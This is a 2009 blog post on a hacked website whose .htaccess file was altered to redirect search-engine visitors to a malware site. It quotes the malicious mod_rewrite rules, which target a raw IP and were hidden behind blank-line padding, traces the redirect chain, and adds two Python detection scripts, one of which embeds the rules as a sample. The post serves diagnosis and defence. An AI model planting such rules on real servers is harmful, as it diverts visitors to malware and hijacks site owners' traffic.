Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic
Posted by Hodge on Jan 14, 2009 in Security, Web Development • 1 comment •
A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.
I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
These lines were also preceded by a couple of dozen lines of white space, so that for most people checking .htaccess the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh, to check the file).
Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).
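As an added example (not code from the original post), here is a small Python scanner that looks for exactly the two things described above: a RewriteRule whose preceding RewriteCond lines test HTTP_REFERER for search-engine names and whose target is a raw IP or a host you do not own, and a run of blank lines padding the top of the file. The sample file contents are constructed for the example (the hijacked one reproduces the rules quoted in the post, plus the padding); the function and script names are my own.

```python
import re
import sys
from typing import List, Tuple

# Constructed sample: the rewrite rules quoted in the post, preceded by the
# blank-line padding the attacker used to push them below the editor window.
HIJACKED_HTACCESS = "\n" * 30 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
"""

# Constructed benign file for comparison: a canonical-host redirect that never
# looks at the referer, so it must not be flagged.
BENIGN_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_HOST} ^calypsoislandtours\\.com$ [NC]
RewriteRule ^(.*)$ http://www.calypsoislandtours.com/$1 [R=301,L]
"""

SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo", "bing")
RAW_IP_URL = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[/:?]|$)", re.I)
URL_HOST = re.compile(r"^https?://([^/:?]+)", re.I)


def leading_blank_lines(text: str) -> int:
    """Number of blank lines before the first directive (the hiding trick)."""
    count = 0
    for line in text.splitlines():
        if line.strip():
            break
        count += 1
    return count


def find_referer_hijacks(text: str, own_hosts: Tuple[str, ...] = ()) -> List[str]:
    """Flag RewriteRules whose preceding RewriteConds test HTTP_REFERER for a
    search engine and whose target is a raw IP or a host we do not own."""
    findings: List[str] = []
    conds: List[str] = []  # RewriteCond lines waiting for their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("RewriteCond"):
            conds.append(line)
            continue
        if not line.startswith("RewriteRule"):
            continue
        parts = line.split()
        target = parts[2] if len(parts) >= 3 else ""
        referer_conds = [c for c in conds if "%{HTTP_REFERER}" in c]
        engines = sorted({e for e in SEARCH_ENGINES
                          for c in referer_conds if e in c.lower()})
        conds = []  # the RewriteRule consumes its condition chain
        m = URL_HOST.match(target)
        host = m.group(1).lower() if m else ""
        ours = any(host == h or host.endswith("." + h) for h in own_hosts)
        if engines and host and (RAW_IP_URL.match(target) or not ours):
            findings.append(
                f"line {lineno}: redirect to {target} fires only for visitors "
                f"referred from {', '.join(engines)}")
    return findings


def scan_file(path: str, own_hosts: Tuple[str, ...] = ()) -> List[str]:
    """Scan an .htaccess on disk; report padding as well as hijack rules."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    report = find_referer_hijacks(text, own_hosts)
    padding = leading_blank_lines(text)
    if padding >= 10:
        report.insert(0, f"{padding} leading blank lines (content hidden below the fold?)")
    return report


if __name__ == "__main__":
    # Usage: python htaccess_check.py /path/to/.htaccess [your-domain ...]
    if len(sys.argv) >= 2:
        for item in scan_file(sys.argv[1], tuple(sys.argv[2:])) or ["no findings"]:
            print(f"{sys.argv[1]}: {item}")
```

Run it over every .htaccess under the document root (hosting accounts often have several, and the post mentions a second one carrying a different IP). Passing your own domain names lets it ignore legitimate canonical-host redirects while still flagging anything that bounces search-engine visitors somewhere else.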
Using a combination of traceroute and the Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect through a string of sites – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page), which installs a cookie: av_inst=880147 (an arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains malware, which I presume does something nasty, although I felt no inclination to investigate further!
Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly back to normal, receiving the search engine traffic it should.
So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
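Because the rules only fire on a search-engine referer, the site looks perfectly healthy when you type its address into a browser, which is why the drop in traffic was the only symptom. The following added example (mine, not from the post) is an outside-in check that requests a page twice, once with and once without a Google Referer header, and reports when only the referred visit is bounced to another host. The real transport uses urllib from the standard library; the two stand-in fetchers at the bottom are constructed so the check can be exercised offline, and all names here are my own.

```python
from typing import Callable, Optional, Tuple
from urllib.parse import urlsplit
import urllib.error
import urllib.request

# A fetcher performs ONE request (no redirect following) and returns
# (status code, Location header or None).
Fetcher = Callable[[str, Optional[str]], Tuple[int, Optional[str]]]

GOOGLE_REFERER = "http://www.google.com/search?q=calypso+island+tours"


def urllib_fetch(url: str, referer: Optional[str]) -> Tuple[int, Optional[str]]:
    """Real transport for checking your own site (not exercised offline)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface the 3xx instead of following it
    headers = {"Referer": referer} if referer else {}
    request = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.build_opener(NoRedirect).open(request, timeout=15) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


def _bare_host(url: str) -> str:
    """Hostname with any leading 'www.' stripped, lower-cased."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def referer_cloaking(url: str, fetch: Fetcher,
                     referer: str = GOOGLE_REFERER) -> Optional[str]:
    """Request the page with and without a search-engine Referer. Return a
    description if only the referred visit is redirected off-site."""
    own = _bare_host(url)

    def off_site(location: Optional[str]) -> bool:
        return bool(location) and _bare_host(location) != own

    plain_status, plain_loc = fetch(url, None)
    ref_status, ref_loc = fetch(url, referer)
    if 300 <= ref_status < 400 and off_site(ref_loc) and not off_site(plain_loc):
        return (f"{url}: {ref_status} -> {ref_loc} when referred from "
                f"{urlsplit(referer).hostname}, but {plain_status} without a referer")
    return None


# Constructed stand-ins for the two behaviours, so the check runs offline.
def hijacked_site(url: str, referer: Optional[str]) -> Tuple[int, Optional[str]]:
    """Mimics the compromised .htaccess: bounce Google visitors to the raw IP."""
    if referer and "google" in referer.lower():
        return 302, "http://89.28.13.201/in.html?s=xi"
    return 200, None


def clean_site(url: str, referer: Optional[str]) -> Tuple[int, Optional[str]]:
    """A canonical redirect to www. is on-site and must not be flagged."""
    return 301, "http://www.calypsoislandtours.com/"


if __name__ == "__main__":
    import sys
    for page in sys.argv[1:]:
        print(referer_cloaking(page, urllib_fetch) or f"{page}: no referer cloaking seen")
```

Against a live site you would call referer_cloaking with urllib_fetch for a handful of landing pages, and repeat it with referers for the other engines listed in the rules. Running it from a cron job gives you an alert within minutes of a re-infection rather than after a week of lost bookings.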
Something not quite right? Inaccuracies or invalid code? Didn’t work for you? Don’t like me using Ss instead of Zs? Add a comment below! All comments are welcome. Except spam, because spam is a bit crap.
[...] http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search…/ [...]